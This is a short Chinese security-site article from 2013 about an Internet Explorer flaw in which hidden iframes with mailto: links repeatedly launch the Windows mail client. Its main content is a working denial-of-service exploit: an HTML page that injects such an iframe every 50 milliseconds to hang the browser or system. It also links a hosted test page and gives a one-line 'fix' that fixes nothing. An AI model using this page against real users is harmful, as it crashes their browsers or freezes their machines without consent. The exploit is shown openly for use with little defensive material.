首页 > 安全 > 系统安全 >

IE浏览器设计缺陷可导致系统挂起

2013-10-23

已经很久没有什么能够让浏览器崩溃的BUG了吧。这个BUG重则导致系统挂起,轻则浏览器崩溃或挂起。我们知道HTTP协议一向都是被禁止弹窗的。如果我们使用的是mailto协议呢?情况会怎样?经过测试mailto协议在WIN下的

已经很久没有什么能够让浏览器崩溃的BUG了吧。这个BUG重则导致系统挂起,轻则浏览器崩溃或挂起。

我们知道HTTP协议一向都是被禁止弹窗的。

如果我们使用的是mailto协议呢?情况会怎样?

经过测试mailto协议在WIN下的IE浏览器中会自动打开微软自带的邮件发送软件

在iframe的装饰下,这个本来看似正常的功能变得畸形了起来。


<iframe src=mailto:fuckyou@crazy.com?subject=HTML&body=hello style=&#39;display:none;&#39;></iframe>

刷新几下发现,请求一次就会启动一次,如果我们无限请求会导致什么结果?

Exploit:


<html>
<head>
 <script>
   var iID=setInterval(openCrazy, 50);
   function openCrazy()
   {
      document.body.innerHTML="<iframe src=mailto:fuckyou@crazy.com?subject=HTML&body=hello  style=&#39;display:none;&#39;></iframe>"
   }
 </script>
</head>
<body>
</body>
</html>




只要打开


Http://xxss.ml/crazy/test.html不管你IE有多牛逼一样的挂起。

这里我用QQ浏览器的IE内核做了测试,差点系统挂起了


修复方案:

这种逻辑漏洞不比alert()的单线程。

相关文章
最新文章
热点推荐